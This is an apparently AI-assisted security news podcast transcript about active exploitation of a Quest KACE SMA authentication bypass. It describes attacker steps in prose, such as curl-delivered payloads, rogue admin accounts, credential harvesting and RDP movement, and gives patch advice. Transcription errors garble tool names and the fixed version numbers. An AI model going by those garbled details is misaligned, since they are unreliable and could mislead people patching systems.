Quest KACE SMA Systems Hijacked via Max-Severity Exploit [Prime Cyber Insights]

[00:00] Announcer: From Neural Newscast, this is Prime Cyber Insights, Intelligence for Defenders, Leaders, and Decision Makers. [00:08] Aaron Cole: This is Prime Cyber Insights for March 23, 2026. [00:16] Aaron Cole: We lead today with a critical warning for organizations running Quest KACE Systems Management Appliances. [00:24] Aaron Cole: We are tracking a Maximum Severity Authentication Bypass, CVE-2025-32975. [00:31] Lauren Mitchell: This is not a theoretical risk. [00:33] Lauren Mitchell: Arctic Wolf reports active exploitation in the wild as of this month. [00:38] Aaron Cole: That is correct, Lauren. [00:39] Aaron Cole: This flaw carries a perfect CVSS score of 10.0. [00:45] Aaron Cole: Threat actors have been weaponizing it since the week of March 9th [00:48] Aaron Cole: to impersonate legitimate users and take over administrative accounts [00:52] Aaron Cole: without requiring credentials. [00:55] Lauren Mitchell: What is striking here, Aaron, is the post-exploitation sequence. [00:59] Lauren Mitchell: Once they have access, they're using curl to drop base64 encoded payloads and rankbot.exe, [01:07] Lauren Mitchell: a native SMA process to create additional admin accounts. [01:12] Lauren Mitchell: It is a highly effective way to hide in plain sight. [01:15] Aaron Cole: The lateral movement is aggressive. [01:18] Aaron Cole: They have been observed using mimic cats for credential harvesting, [01:22] Aaron Cole: and then moving via RDP to domain controllers and backup infrastructure like Veeam and Veritas. [01:29] Aaron Cole: Losing control of your management appliance effectively hands over the keys to the entire environment. [01:35] Lauren Mitchell: The most frustrating aspect for practitioners is the timeline. [01:40] Lauren Mitchell: Quest released the patch for this in May 2025. [01:44] Lauren Mitchell: We are nearly a year out, yet unpatched internet-exposed instances remain an open door for these attackers. [01:51] Aaron Cole: It underscores the danger of set it and forget it for management appliances. [01:56] Aaron Cole: Speaking of persistence, we are also tracking a new evasion technique called the zombie zip method reported by malware bites. [02:04] Aaron Cole: It allows malicious files to bypass antivirus scans by manipulating the archive structure. [02:11] Lauren Mitchell: Exactly, Aaron. It is a reminder that detection tools are only as good as their ability to parse complex file types. [02:19] Lauren Mitchell: We are also seeing Apple push out WebKit patches to address bugs that could allow malicious sites to access user data. [02:27] Aaron Cole: For the Quest KACE systems, the mitigation is clear. [02:32] Aaron Cole: Update to versions 13.0385, 14.1, 101 or higher immediately and ensure these appliances are never directly exposed to the Internet. [02:44] Aaron Cole: Lauren, what are your thoughts on the broader implications? [02:48] Lauren Mitchell: Visibility is paramount. [02:50] Lauren Mitchell: If you are running case SMA, check your logs for unusual runkbot.exe activity or unexpected [02:57] Lauren Mitchell: PowerShell registry modifications. [02:59] Lauren Mitchell: Do not assume that because a patch is old, the threat has passed. [03:04] Aaron Cole: That concludes our briefing for today. [03:06] Aaron Cole: For more technical deep dives, visit pci.neuronuzcast.com. [03:11] Lauren Mitchell: This program is for informational purposes. [03:14] Lauren Mitchell: Always consult with your internal security team [03:17] Lauren Mitchell: before making infrastructure changes. [03:19] Lauren Mitchell: Neural Newscast is AI-assisted, human-reviewed. [03:23] Lauren Mitchell: View our AI transparency policy at neuralnewscast.com. [03:27] Lauren Mitchell: See you tomorrow. [03:28] Announcer: This has been Prime Cyber Insights on Neural Newscast. [03:32] Announcer: Intelligence for defenders, leaders, and decision makers.